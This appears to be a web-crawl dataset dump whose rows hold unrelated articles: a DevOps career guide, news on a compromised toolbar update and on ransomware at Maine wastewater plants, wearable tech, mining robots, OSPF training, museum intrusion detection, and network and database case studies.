text
stringlengths 234
589k
| id
stringlengths 47
47
| dump
stringclasses 62
values | url
stringlengths 16
734
| date
stringlengths 20
20
⌀ | file_path
stringlengths 109
155
| language
stringclasses 1
value | language_score
float64 0.65
1
| token_count
int64 57
124k
| score
float64 2.52
4.91
| int_score
int64 3
5
|
---|---|---|---|---|---|---|---|---|---|---|
What is DevOps?
Traditional software development projects used a compartmentalized mindset. When the need arose for a new piece of software, a company would assemble a team devoted to that application. Once that team creating the app, the completed software would be passed to an operations team to manage.
Any updates to the software would require a business to pull together a new team to address those issues. That often caused friction between the operations team charged with making sure a platform remained viable for users, and development teams who were focused on getting their changes up and running.
DevOps evolved from the mindset of agile development, which takes a more collaborative and iterative approach to software development. It promotes continuous interactions and feedback between team members and stakeholders as they work to refine and improve a piece of software. Approaching application management from a DevOps perspective makes room for the continuous evolution of a project while promoting the partnership between IT development and operations areas - hence the moniker “DevOps."
With DevOps, companies gain the ability to standardize how they approach application development while automating the delivery, security, and maintenance of various software products. It’s a way of breaking down the costly silos that often crop up in organizations of all sizes in application development.
How do DevOps Engineers Fit Into an IT Organization?
DevOps engineers facilitate various aspects of development and operations by taking on several roles throughout the process. They make sure the company stays on-track in delivering on project goals. They ensure consistency in making code changes and deployments of new versions of software to various environments.
The best DevOps engineers understand how to step back and see the big picture. They also know how to assess individual functions in a process and make them work more efficiently. For example, they may make a recommendation on the tools that testers should use when evaluating the viability of a new web application.
Computer schools offer courses, certificates, and college degree programs featuring the skills you need to become a devops engineer. Compare devops engineer training programs in the U.S. and online below.
a.k.a. Development Operations Manager | Integration Specialist | Release Manager | Automation Engineer
DevOps Engineer Salaries
Courses and Degrees
DevOps Engineer Certifications
DevOps Engineer Job Outlook
DevOps Engineering Jobs
What are the Responsibilities of a DevOps Engineer?
Good DevOps engineers make software functions appear seamless from the outside. They interpret and execute the needs of developers, managers and other stakeholders and address issues that come up during different project iterations.
DevOps engineers function similarly to IT project managers in many ways. They help bridge the gap between the operations team and developers and help each other understand the role they play in ensuring successful software project outcomes.
Let’s take a deeper look at some day-to-day tasks of DevOps Engineers:
- Infrastructure Management: DevOps engineers continuously monitor the different functions that go into app development and deployment. They make sure users have the access they need, that databases can scale to meet business demands, and oversee the management of different workflow processes. The role also calls for oversight of testing and automated deployments.
- Security Oversight: DevOps engineers ensure the security and integrity of any software deployed by the company. They look for and resolve any problems that could lead to breaches of confidential business data. DevOps engineers also collaborate with the cyber security team to ensure compliance with existing company protocols.
- Automation Management: Modern DevOps typically involves the use of various automation tools to ensure the smooth delivery of code to different environments. DevOps engineers should understand how to wield automation to eliminate manual processes and add more efficiency to the software development life cycle.
What Skills do DevOps Engineers Need?
A reliable DevOps specialist understands every aspect of the Software Development Life Cycle (SDLC) - which is basically defined as the systematic procedure for planning, developing, testing, deploying and maintaining a software system. They also need a solid understanding of core DevOps principles and best practices.
Here are some of the most important and marketable skill sets for devops engineers:
- Agile Development: DevOps engineers help teams organize work in shorter iterations, called sprints, to get through an increased number of releases. They also help map out the work that teams must complete in upcoming iterations, and incorporate feedback from each version of a software platform to address future issues.
- Continuous Integration (CI): DevOps engineers make sure that new code coordinates properly with an existing codebase. It’s their job to ensure consistency in development and avoid the inclusion of components that would hurt performance and negatively affect users.
- Continuous Delivery (CD): DevOps engineers oversee the continual delivery of new code via testing and automation. They look for ways to remove waste and ensure that code is consistently ready-to-deploy. DevOps engineers should understand how to leverage popular CI/CD tools like Jenkins to manage different aspects of continuous delivery.
- Orchestration: One essential skill often relied upon by DevOps engineers is being able to analyze current practices and look for ways to improve efficiency by removing manual tasks. The orchestration process makes sure any repetitive steps performed by humans get transformed into an automated process to speed up deployments. Such functions include implementing database changes or launching a new web server.
- Source / Version Control: Source control tools, also called version control tools, help DevOps engineers cut down on development time and improve their chances of having successful deployments. These tools facilitate the tracking and storage of any changes to software projects over different periods. Popular source control tools include GitHub, Subversion, AWS CodeCommit, and Microsoft Team Foundation Server.
- Container Management: Containers make it easier for DevOps engineers to set up hosting of different applications in a portable environment. They let you create exact copies of a system required for deployment. Containers are more lightweight than the virtual machines used for this purpose in the past. Examples of popular container technology include Docker, Kubernetes, Microsoft Containers, and DigitalOcean. Using containers helps DevOps engineers ensure consistency across multiple environments.
What Kind of Background Should a DevOps Engineer Have?
Anyone interested in filling the role of a DevOps engineer within an organization should have experience working with different testing tools, integration technology, working with automation, and various programming languages. Most DevOps engineers start with a background in IT project management, system management, database administration, software development, or other IT careers.
DevOps Engineer Salary
Thanks to their significant impact on business processes and the bottom line, DevOps engineers enjoy one of the highest base salaries in the IT job market. The mean annual wage for development operations engineers in the U.S. is $119,000.
Average salaries for DevOps engineers and related job roles:
- DevOps Engineer: $119,000
- Software Developer: $108,366
- Front-End Web Developer: $107,276
- IT Project Manager: $96,509
- Database Administrator: $95,357
- Computer Systems Analyst: $80,787
- Computer Programmer: $76,085
Top paying states for DevOps engineers:
- California: $150,000
- New York: $146,000
- Massachusetts: $140,000
- New Jersey: $135,000
- Washington: $133,000
Sources: Indeed.com | Talent.com
DevOps Engineer Education Requirements
DevOps engineers typically start with an undergraduate degree in software engineering, computer science, or a related information technology field. A degree in mathematics can also provide the foundation needed to progress in DevOps engineering.
Aspiring DevOps engineers should choose a curriculum allows them to focus on the following disciplines:
- Cloud Architecture: With so many organizations moving toward cloud technology for data and application needs, DevOps engineers should know the basics of cloud architecture. This role will likely require the management of applications and databases on a cloud server. Look for programs that cover topics like cloud computing, database management in the cloud, and serverless architecture.
- System Architecture: DevOps Engineers should understand how to assess and support the entire DevOps pipeline used to support development, testing, and CI/CD processes. That means understanding the flow of all company systems and the impacts various changes have on users in different areas of an organization. Take courses covering topics like distributed system design, software architecture and design, and client-server design. Knowing the ins and outs of data recovery, networking, and memory management is also helpful.
While it’s vital to have the right technical expertise (hard skills), DevOps engineers also need business and communication know-how (soft skills) to succeed in this role.
Here are some of the most desirable soft skills for DevOps engineers:
- Effective team management and leadership
- Clear and precise communication to users across different levels of technical knowledge
- An understanding of company culture and the people using managed software products
- A commitment to quality control to ensure the integrity of the DevOps process
- The ability to provide consistent feedback to developers and other stakeholders
Compare courses and degrees that align with devops' education requirements.
DevOps Engineer Courses & Degrees
To date, there aren't many college degrees focused expressly on devops, however many programs include coursework in the skills needed to become a DevOps Engineer. Here are some courses and degree programs that align well with devops engineering.
Bachelor of Science in Cloud Computing & Solutions
- Includes certification preparation for:
- Cisco Certified Network Associate (CCNA)
- Use cutting-edge cloud computing tools to solve real-world business and technology problems
- Create local and hosted virtualization solutions
- Develop secure cloud-based software applications
- Explore the best practices of cloud services management
- Foundational IT skills in networking, systems administration, cybersecurity, computer programming & data management
Bachelor of Science in Computer Science: Software Engineering
- Gain the Skills to Pursue Sought-After Roles in Web and Mobile Application Development
- Full Stack Software Design and Engineering
- Build Systems Architectures to Meet Business Needs
- Design UIs for Embedded, Cloud & Mobile Systems
- Analyze and Design Data Structures & Algorithms
- Cybersecurity Tools & Techniques ft. Secure Coding
Master of Science in Enterprise Networks & Cloud Computing
- Implement Cloud Solutions to Meet Complex Goals
- Design, Manage & Secure Enterprise IT Networks
- Cloud Distribution Systems inc. SaaS, PaaS & IaaS
- Cloud Application Deployment and Operations
- Database, Application and UX Development Training
- Global Network Policy, Regulation & Governance
- Information Technology Project Management
- No GRE or GMAT Exams Required for Admission
Master's in Technology Management
- Prepare for Leadership Roles in Business and Information Technology
- Cloud Computing and Virtual Data Centers
- Business Intelligence and Data Analytics
- Cyber Security Threats & Countermeasures
- Globalization and the Modern IT Workforce
- Computer Systems Analysis Tools & Techniques
- Wield Emerging Technologies and IT Personnel to Achieve Business Goals
- No GRE or GMAT Required for Admission
DevOps Engineer Certifications
DevOps engineers looking to enhance and validate their skills should consider earning certifications in these domains. It shows employers your commitment to maintaining and growing your skillset. Keep in mind that every company has their preference when it comes to a technology stack.
Here are some of the most desirable certifications for devops engineers:
- Cloud Development & Architecture: Companies like Amazon and Microsoft offer DevOps engineers the opportunity to obtain highly marketable certifications in Amazon Web Services (AWS), Google Cloud Platform, or Microsoft Azure Cloud.
- Windows/Linux: Many DevOps engineers will find themselves needing to work with and manage both Linux and Windows operating systems. Obtain certifications like the CompTIA Linux+ or Microsoft Certified Solutions Associate (MCSA) to validate your skills on these platforms.
- Cyber Security: Security is an essential aspect of DevOps engineering. DevOps engineers must protect the pipeline from potential data breaches and ensure the security of any new code or technology introduced to the process. A vendor-neutral credential like CSA's Certificate of Cloud Security Knowledge (CCSK) is helpful here.
Job Outlook for DevOps Engineers
The future for DevOps engineers is as bright as the overall prospects for the field of information technology. As long as there are developers creating new projects for companies, there will be a need for those experts who can take a 360-degree view of what’s involved in building, testing, and releasing quality builds to better serve customers.
That view is backed up by a 2019 DevOps Skills Report from the DevOps Institute. The survey showed high workforce demand for skilled development operations engineers to manage their code releases, greater than any other kind of software engineer.
According to the U.S. Bureau of Labor Statistics, the job market for software developers (the closest position to devops engineer in the BLS projections) is expected to grow by 19 percent from 2020 through 2030, more than double the 8% growth rate for all occupations. The DevOps segment should grow even faster.
Lasting success and upward mobility in devops means constantly growing your skill set. There’s always a new technology on the horizon promising to change how we build, release and manage software. It’s up to DevOps engineers to assess their viability and make sure they’re safely incorporated into the current CI/CD model favored by their employer.
DevOps Engineering Jobs
Your DevOps skills and experience may qualify you for a range of lucrative positions. Use the links below to browse and apply to:
- DevOps Engineer jobs
- Software Developer jobs
- Agile Project Manager jobs
- IT Project Manager jobs
- Automation Engineer jobs
- Java Developer jobs
- Cloud Engineer
- IT Project Manager
- Software Engineer
- Database Administrator
- Mobile App Developer
- Web Developer
|
<urn:uuid:628a4795-7086-4901-9d05-27f6dddf4956>
|
CC-MAIN-2022-40
|
https://www.itcareerfinder.com/it-careers/devops-engineer.html
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00656.warc.gz
|
en
| 0.913988 | 2,999 | 2.71875 | 3 |
In the late 90s and early 2000s, most web browsers came with small, add-on programs to enhance browsing. Most of these programs were toolbars, which added functionality like search, bookmark management, local weather forecast and more in an easy to access area of the browser. All-in-all, they were harmless, albeit annoying. That is no longer the case. Ask.com, purveyor of the somewhat well-known Ask.com toolbar, has fallen victim to two very specific and targeted attacks.
The first attack, according to BleepingComputer.com, took place at the end of October. Third-party security vendors detected the attack and alerted the toolbar’s creator, Ask Partner Network (APN). APN quickly flushed the intruders out of their network, but only temporarily. The cybercriminals returned in December, specifically re-infecting the Ask.com toolbar with potentially unwanted programs.
So why are these small, innocuous and potentially unwanted programs (PUPs) bad for end users? Simple: they offer cybercriminals more opportunities to compromise networks and users. They, in the parlance of the cybersecurity industry, expand the attack surface for hackers.
The cybercriminals responsible for this attack managed to compromise APN’s network at least twice. By doing so, they were able to take advantage of the company’s digital certificates—essentially little strips of code proving APN is who they say they are—to push malicious updates to end users. These strips of code essentially act as an I.D. card for companies, allowing them to issue trusted, verified updates for their programs to end users.
Compromised digital certificates can cause a lot of damage. In this case, cybercriminals used the certificates to trick end users into updating their Ask.com toolbar. By doing so, they unknowingly downloaded a corrupted file that enabled the attackers to both unpack a Remote Access Tool/Trojan (RAT) and steal credentials that would allow them to target other computers on the network.
The good news here is that the attack appears to be highly manual in nature. The security report even details typos in the attacker’s code, and suggests that a human—not an automated bot—may be issuing the attack in real-time. This means the attack is slow-moving and unlikely to hit a lot of users at once, giving security firms the time they need to detect the attack.
This does not, however, mean it’s impossible for crooks to pull off. To head off this potential exploit and protect your devices, follow these tips:
- Watch what you install. There are a lot of programs out there that are available for downloading. Do yourself a favor and limit yourself. While most programs are safe, some can pose problems. Only download programs from trusted app stores or directly from developers you trust.
- Stay up to date with updates. Installing updates when they’re available is one of the most sure-fire ways of staying safe online today. Yes, this attack occurred with a bad update, but attacks like this are extremely rare. Install updates when they’re available to ensure the latest security patches are in place.
- Use comprehensive security. Comprehensive security solutions are key to living a safe digital lifestyle. Security suites, like McAfee LiveSafe™, can help protect your devices with the latest, up-to-date security technology, and are essential to cross-device security today.
Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats.
|
<urn:uuid:dca0c49d-74c6-434a-bcc6-80b3a2d7d795>
|
CC-MAIN-2022-40
|
https://www.mcafee.com/blogs/internet-security/cybercriminals-learn-love-extensions-like-toolbars-recent-targeted-attacks/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00656.warc.gz
|
en
| 0.940743 | 743 | 2.640625 | 3 |
Walking with WiFi.
Wearable technology is allowing us to interweave technology even further into everyday life. In fact, wearable technology is set to transform our lives: from healthcare to gaming and augmented reality. Will we all soon be wearing technology devices? Probably. So it is no wonder that there could be one public WiFi hotspot for every 20 people on Earth by 2018. Without WiFi, wearable technology would not exist.
What is wearable tech?
Wearable technology is absolutely as it sounds: any electronic technology or computers that are incorporated into items of clothing and accessories. Most of us own a smartphone and many have heard of fitness trackers and even smart watches. You guessed it, there is even more out there to explore. Wearable smart rings in the near future perhaps?
The cleverest of these wearable devices can perform most tasks that we might expect from a computer or laptop that is on our desk waiting for us when we arrive at work. Actually, in many cases, wearable tech is even more highly developed and sophisticated. This is because it can be used to scan, track and provide sensory feedback on ourselves, for example biofeedback or physiological functions.
Usually wearable tech communicates in real time
This means that we can get our information instantly from our smart wearable watches, glasses or hearing aid devices. The whole idea of wearable technology is that we can get hands free, we’re online all the time and we can experience seamless and portable access to the data we need exactly when we need it. As you know, we are completely getting used to having data presented to us instantaneously.
Examples of wearable tech:
Health tracking devices
These remove any form of ‘denial’ when trying to get fit and healthy – think New Year’s Resolutions! Health trackers are actually classed by some as a type of smart watch as they are worn on the wrist. They basically allow your body to talk to you as you attempt to improve your BMI. Health trackers provide feedback on things such as heart rate, body fat and weight (eeeeek) and even your skin’s electric conductivity. The Simband, for example, is equipped with six sensors. The six sensors it comes with can keep tabs on your daily steps, heart rate, blood pressure, body temperature, and how much sweat your sweat glands are producing.
Listening to your whole body can be important for the maintenance of good health. For example measuring your GSR (galvanic skin response – or sweat to you and I) can provide an indication of how stressed you are. It could be a great measure of the situations causing the highest stress response, to warn people who are suffering from stress related illnesses, and highlight which situations are best to avoid. This can be difficult, of course, if stress relates to work or the school run. However, it might also indicate which behaviours lead to the least stress response and maybe where to go, or what to do to reduce the effects of any stressful experiences. All the information can be wirelessly synced to statistics with online graphs and keep you on track of all your personal health and fitness goals.
If total feedback on your body’s health doesn’t sound like quite enough info, then perhaps it’s time look into a smart watch. Some of the smart watches will enable you to download all the health and fitness trackers onto apps as well as being a small portable computer. This technology effectively lets you get the measure of your whole life.
A smartwatch originally performed what now seem simpler tasks such as calculations, translations, and games. A traditional smart watch still acts as a timekeeping device but also includes the features we expect from our devices today: calls, texts emails and even web-browsing. The earlier smart watches require a paired smartphone, connected wirelessly through Bluetooth to work.
Standalone smart watches now operate on their own, without the need for a paired smartphone, often taking SIM cards just like a cell phone. They include all the same functionality of a full-featured smartphone, just in a wearable form where data can be accessed through WiFi. So, nowadays smart watches are like mini wearable computers which run mobile apps, are media players and some can be used as a mobile phone to take calls.
Is a hands free, optical head mounted display and communication with the internet is through voice command. The use of Google Glass has been demonstrated in healthcare and shows how technology can vastly improve patient care. It has been used already to demonstrate surgery as it is happening and educating medical students who can watch the procedures remotely.
Google Glass is great for all types of education. Teachers are being encouraged to create ‘first person’ video guides. Indeed, students themselves could record their interactions with each other, whilst working collaboratively on a piece of work or whilst out in the field. School trips for students can be highly educational but many students won’t be able to afford to go on all the trips offered by their institution. Students could enjoy watching remotely what is going on in real time. This article in the Huffington Posttells us more about uses in education such as wearing it while training for sports. Students can use real time instruction and players could record and understand their own movements better, use it to take notes in lectures or even to ask questions to the lecturer via text.
Even simply watching sports on TV could be improved. With an app to alert fans when a game is getting exciting such as last minute changes to scores, games going into extra time or grand slam tennis finals going into a fifth set, glass wearers could be pinged so as not to miss anything.
Other industries could benefit too. For example, in industries such as manufacturing, Google Glass could have a massive impact because they would allow for on-the-job training of workers in how to fix equipment.
Where will this all lead? The future of wearable tech
Wearable tech doesn’t necessarily have to mean that it is taken off as easily as the examples above. There are more invasive versions such as microchip implants or even smart tattoos – not for the faint hearted.
What wearable tech will actually be able to do is so far reaching it’s mind blowing. There are obvious benefits in that it has implications in the fields of medicine, health and fitness. In fact, wearable technology is set to transform the health and wellness industry.
And that’s not all…..
There is also bound to be a fun aspect to wearable technology and for gamers there is the promise of more realistic gaming environment with augmented reality. Augmented reality combines the real world and some computer generated sensory input, so gamers can become even more immersed online.
It could even be used in retail where you are literally ‘wearing’ the technology. Via virtual mirrors, you can have your body shape scanned and clothes projected onto you as a way of trying on before you buy without actually taking off the clothes you are in.
All that’s left now is to develop a range of aesthetically pleasing designs.
As well as practicality and function of wearable tech, researchers are also considering design and even fashion. We may start to see wearable technology in in our favourite bands of clothes: t-shirts, jackets, headbands and jewelry.
In fact, wearable devices may transform the use of mobile devices altogether in the not so distant future. The potential wearable trends of the future are documented here. The ones to watch out for include solar clothes that can recharge your phone, a tracker to work out where each outfit is in your wardrobe, bike helmets with a built in navigation system (better than using a smartphone whilst cycling along). There are also going to be smart socks that work out if you are making injurious movements whilst running, smart bras that track your heart rate, and even more luxurious clothing that uses technology to enhance the look.
Exciting times for wearable technology. How do you think we should wear it?
|
<urn:uuid:b4ddc318-b368-40d8-b09e-8acd0cac7a14>
|
CC-MAIN-2022-40
|
https://purple.ai/blogs/wifi-and-wearable-tech/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00656.warc.gz
|
en
| 0.964362 | 1,639 | 3.171875 | 3 |
Two recent ransomware attacks successfully breached computers at wastewater management plants in the US State of Maine, according to a statement by the state’s Department of Environmental Protection.
While the two cyberattacks, which hit facilities in the towns of Mount Desert and Limestone in the US’s most northeastern state, are believed to have posed no threat to human safety, they were far from benign, and have raised serious concerns about the potential danger to human life created by of cybersecurity vulnerabilities present in America’s decentralized critical infrastructure. Even if major essential service providers were to perfect their own cybersecurity operations, large numbers of smaller providers – sometimes functioning on just municipal scales – can still pose serious risks to life, health, safety, and property if they are not adequately protected against cyber threats. Furthermore, because there are not yet any uniform, nationwide, cyber-breach reporting requirements to which either municipalities or wastewater treatment facilities must adhere, nobody truly knows if we, the people of the United States, already have a serious problem. (There is currently legislation in progress in the US Congress that would create some basic, standard governance in this regard.)
While the Limestone Water and Sewer Department breach is alleged to have taken out a single computer running the long-obsolete Windows 7 operating system which was subsequently replaced with a newer machine (Click here to learn more about why you should not run long-obsolete operating systems), the Mount Desert Wastewater the attack apparently took various office computers offline for three days. Like the former attack, however, that breach did not impact any actual wastewater treatment processes, as the equipment that Mount Deseret Wastewater utilizes to perform such functions is, according to its superintendent, Ed Montague, “manually controlled with no automated inputs.”
Officials have said that operations at both facilities were fully recovered without paying any ransoms to cyber-criminals, and that no sensitive information was compromised as a result of the breaches.
Yet, the breaches are still of concern, and may foreshadow more sinister attacks in the future, as well as remind us that there may be ongoing, potentially dangerous, attacks about which we do not yet know.
Clearly, while we may have been lucky in Maine in July, unless we do a better job at protecting our critical infrastructure from cyberattacks, it is a matter of when, not if, we will suffer a much more dangerous breach.
As noted by Brian Kavanah, director of the Bureau of Water Quality at the Maine Department of Environmental Protection, cyberattacks on wastewater plants can wreak dangerous havoc by disabling pumps and other equipment or otherwise interrupting the treatment of sewage and other wastewater. Of course, as in most other environments, sensitive data could also be compromised and/or manipulated on computer systems used for managing operations. In short, according to Kavanah, “Cyberattacks on wastewater infrastructure can cause significant harm.”
Let us transform the two recent breaches in Maine into a nationwide wake up call about the dangers of cyberattacks at any of our huge number of smaller providers of critical infrastructure services – perhaps some of the funds that will be allocated as part of the new infrastructure improvement bill passed by Congress should be utilized to beef up cybersecurity for our existing critical infrastructure.
|
<urn:uuid:afa8dacb-9b4c-457c-85a9-8e9e2a2c3a2c>
|
CC-MAIN-2022-40
|
https://josephsteinberg.com/ransomware-maine-sewage/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00656.warc.gz
|
en
| 0.96139 | 659 | 2.515625 | 3 |
Thank you for Subscribing to CIO Applications Weekly Brief
Robots to Take Over Mining
AI-enabled mining robots, empowered with machine learning algorithms, can detect harmful gases in the mines as well as alert miners to take precautions.
FREMONT, CA: Automation, so far, has been a beneficial addition to many industries. Automaton of tasks involved in mining such as detecting minerals, excavation, and others by using mining robots can truly bring a revolutionary change in the mining industry. As a consequence, the use of mining robots is empowering mining companies to increase their profitability and productivity. From gold to coal, many useful materials are dug out from mines. Mining is not a risk-free job. Hence, using mining robots in the dangerous processes involved in mining has proved to have decreased death counts.
AI-enabled mining robots, empowered with machine learning algorithms, can detect harmful gases in the mines as well as alert miners to take precautions. From helping in excavation, extraction, and transportation of minerals to monitoring mines, mining robots are transforming the mining industry.
In underground mining, the material mined is transported from the mining cave to the surface above. Nowadays, the material is moved with the help of either haulage vehicles, conveyors, or hoisted bins that are manually operated. Manual driving of the vehicles and transporting of the extracted materials to the underground loading points or the surface can be hazardous and monotonous tasks. The mediums or the vehicles utilized for transporting minerals can be automated, similar to the AI-enabled self-driving cars. Two primary purposes for automating the transporting vehicles are improved safety and enhanced efficiency. While transporting extracted minerals, there is often a risk of rockfall, and the risk can be mitigated with automated transport vehicles. Automated vehicles will significantly reduce the labor cost as well as will work round the clock, thus increasing efficiency and productivity.
The first task in the process of mining is drilling. Extracting minerals is only possible by drilling into mines. From digging into the mine to creating a tunnel for transporting the material from the mined area to the surface, every task of mining requires drilling. The process of drilling has now become automated. Semi-automated drilling machines are also available that can drill holes with a little effort over periods of time. The automated drill machines can perforate into the earth to a depth of several meters.
|
<urn:uuid:88e8c58d-5787-4333-b350-009e56a28c08>
|
CC-MAIN-2022-40
|
https://www.cioapplications.com/news/robots-to-take-over-mining-nid-6958.html
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00056.warc.gz
|
en
| 0.950631 | 489 | 2.84375 | 3 |
New Training: OSPF Foundation Concepts
In this 10-video skill, CBT Nuggets trainer Keith Barker covers the fundamental components and functions of OSPF for IPv4, including link-state advertisements (LSAs), normal areas, network types, summarization, and filtering. Gain an understanding of Type 1, Type 2, Type 3, Type 4, and Type 5 LSAs. Watch this new Cisco training.
Learn Cisco with one of these courses:
This training includes:
1.3 hours of training
You’ll learn these topics in this skill:
Introducing OSPF Foundations
Router LSAs (Type 1)
DRs, BDRs, and Others
Network LSAs (Type 2)
ABRs and Summary LSAs (Type 3)
ASBR and External LSA Type 5
Type 4 LSAs
OSPF Full Adjacencies
A Brief Introduction to OSPF
OSPF is a core routing protocol. It's primarily used with autonomous systems, and as such, is a basis on which IP routing is performed. OSPF is a basic principle that aspiring network admins need to understand in the same way that system integrators need to understand how a BIOS works.
OSPF stands for Open Shortest Path First. That name should offer a big clue in what this protocol does. OSPF uses a special algorithm for locating the shortest available path between point A and point B in a network. That algorithm is called Dijkstra’s Shortest Path First algorithm. Once that path is identified, networking equipment will use it to route traffic through a network.
Though OSPF is a common protocol, it will differ slightly depending on whether it is being implemented in an IPV4 or IPV6 network. Both IPV4 and IPV6 use different standards of the OSPF protocol.
It's important to note that though OSPF will attempt to utilize the shortest network path for routing traffic, this may not always be the case for software-defined networks. In theory, the shortest path is typically the fastest. Software-defined networks build on top of that idea but instead send traffic through the fastest available path. Sometimes the shortest path may include delays that incur too much latency in communication. In this case, software-defined networks may opt for a longer path instead that offers faster routing.
|
<urn:uuid:44c2358f-57ba-4285-a31d-5cc886c6589b>
|
CC-MAIN-2022-40
|
https://www.cbtnuggets.com/blog/new-skills/new-training-ospf-foundation-concepts
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00056.warc.gz
|
en
| 0.889548 | 499 | 3.0625 | 3 |
World Heritage Site, the mausoleum of China's first emperor, protected by these clay warriors, has powerful fail-safe detectors, to alert to the inlet of thieves and possible damage to the sculptures.
The Mausoleum of Emperor Qin Shi Huang, UNESCO World Heritage Site, located in Xi'an (China), houses an army of 2000 years old made of clay statues, Terracotta Warriors, who keep the tomb of China's first emperor.
With an intruder detection system that had become obsolete, one of the priorities has been to update it and address several key security challenges. One of them was, until the arrival of the pandemic, was to respond to the high volume of thousands of visitors a day with a fast alarm system, fail-safe, if the exposed elements are in danger.
In addition to the constant risk of potential thieves trying to steal exposed items, the biggest threat comes from tourists, those who drop mobile phones and cameras into the pits, limited areas and possible damage caused by.
Another challenge was that the new solution had to work in extreme conditions, since the pits, which house several thousand statues of clay warriors, contain large amounts of dust that can impede the work of the detectors. Finally,, the system had to be discreet, without interfering in the experience of observing warriors and statues of horses on a natural scale.
With these challenges, Bosch experts developed a combination of several hundred intrusion detectors in the 16.300 m2 of the museum area. In order to achieve rapid detection of security failures, wall-mounted detectors were installed along the pits, which was complemented by those installed on the ceiling, above the areas where visitors pass and those that are open.
The detectors, integrated into the manufacturer's G Series control panels, operate with microwave and infrared technologies, improved by First Step processing algorithms (Fsp) to detect changes in infrared energy when a person exceeds a predefined safety limit inside the museum and along the perimeter.
By eliminating false alarms due to dust and other environmental interference, pit detectors use an infrared pyroelectric sensor (Pir) and adaptive microwave noise processing technology.
One differential feature is that sensors provide accurate intrusion detection, even if they are mounted on the vaulted, raised roof of the Terracotta Warriors Museum. Specifically,, the roof is at 4,8 m height, which exceeds the limits of standard ceiling detectors by more than 2 M.
In the event of an intrusion attempt, Bosch's G Series control panels trigger an alarm in the museum's control room in just two seconds. In addition to the exact location of the detector, the security team receives real-time images of the scene from a surveillance camera, thanks to the integration of a third-party video security platform, for a quick and effective response.
Integrated security system also responds to another key requirement for museum operators: considering that a large part of the exhibited pieces are stored elsewhere when needed, who in turn must be safe from thieves, Bosch detectors protect these storage facilities .
This use of detectors not only saves costs on surveillance personnel for these spaces, who are protected from intrusion and damage, but visitors enjoy a personal experience when looking at ancient objects without any fences or barriers that limit their journey.
Did you like this article?
Subscribe to our RSS feed And you won't miss anything.
• Section: Case studies, Access control, HIGHLIGHTED CASE STUDY, MAIN HIGHLIGHT, Detection, Intrusion, Services
|
<urn:uuid:3fadb3d8-ea47-4913-a515-4b52035c4003>
|
CC-MAIN-2022-40
|
https://www.digitalsecuritymagazine.com/en/2021/02/12/museo-guerreros-terracota-protege-tecnologia-intrusion-bosch/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00056.warc.gz
|
en
| 0.943526 | 712 | 3.328125 | 3 |
The architecture of the product is network-neutral and therefore helps administrators facilitate application control in computers that have Microsoft Windows installed in them, irrespective of their network setup. Your network setups can include the following:
If you have a Windows Active Directory-based network, you can install the Central Server in a single location for centralized management all the computers within the Active Directory. For more information, see Architecture for LAN.
If you have a workgroup-based network, you can manage the computers in the workgroup from a central location. You should ensure that all the computers have a common set of credentials. For more information, see Architecture for LAN.
The WAN architecture helps you to manage Windows computers that span across multiple locations. These computers can be connected using a Virtual Private Network (VPN) or through the Internet. When computers in different locations are connected using the Internet, the Central server should be installed and configured as an edge device. This means that the designated port should be accessible through the Internet. You need to adopt necessary security standards to harden the operating system where the Central server is installed.
You must open the following Web ports in the server:
For more information, see Architecture for WAN.
You can manage computers of mobile or roaming users who connect to your network using a VPN connection or through the Internet. The agent installed in their computers contacts the Central server installed in your network periodically. It gathers information about the necessary instructions and executes the same. It also updates the data and status information in the Central server. For more information, see Manage Roaming Users.
Computers across multiple domains can be managed if the multiple domains are set up in the following ways:
The computers within the same domain or workgroup should have a common set of credentials irrespective of the domains they are combined with. For more information, see Architecture for WAN and Architecture for LAN.
*Refers to Active Directory, workgroups or other directory-based networks
|
<urn:uuid:af737080-9d18-4e5f-b4ba-686d745931dd>
|
CC-MAIN-2022-40
|
https://www.manageengine.com/endpoint-dlp/help/supported-networks.html
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00056.warc.gz
|
en
| 0.898267 | 398 | 2.515625 | 3 |
Latency = delay. Also referred to as a ping rate, it is the amount of delay (or time) it takes to send information from point to point. Latency is usually measured in milliseconds. In retail and e-commerce, it can represent the difference between success and failure.
The Customer, an iconic American clothing manufacturer, was in the process of migrating databases from multiple legacy database vendors to Amazon Web Services (AWS).
As is common with migration efforts, the new AWS environment was experiencing slow response times leading to a loss in transactions. To put this in perspective, an outage on Black Friday would cost the Customer over $45,000 per/minute.
The Customer had created a Redshift Database Environment that facilitated collation of data from multiple sources across both a transactional and analytical platform. The purpose of the data warehouse was to maintain a repository of data on which can be analyzed, reported on, and used to make business decisions ahead of planned events or key sales periods. The data warehouse that was deployed had a number of functions that it needed to support in order to fulfill its purpose. Those functions included the ability to ingest large quantities of data from multiple transactional and analytical database platforms, such as Oracle and SQL Server, transform the ingested data into the correct format, and store it in the Redshift warehouse in a timely manner; all while providing Business Critical Reports to key personnel that would use the data to make key business decisions. The system as designed was not able to fulfil the basic functions outlined, as it was frequently crashing. In essence, the system lacked the predictability, stability, and scalability.
- The Customer’s Data analytics system was the primary analytics platform for customer data
- The Data analytics system was on Redshift and ran daily data pipelines to load and transform data in Redshift
- The majority of these Online Transactional Processing (OLTP) activities were run during the their business window
- The analytics team was dependent on this data for ad hoc analysis, Tableau dashboards, and other analytics processes
- Inefficiencies in the system meant that jobs were getting stuck
- mLogica identified locks blocking critical ELT jobs
- Manual processes
- Lack of resources
- Short window
The Customer wanted to bring in more data from internal data sources, as well as, third party data sources and open the analytics platform to more users globally.
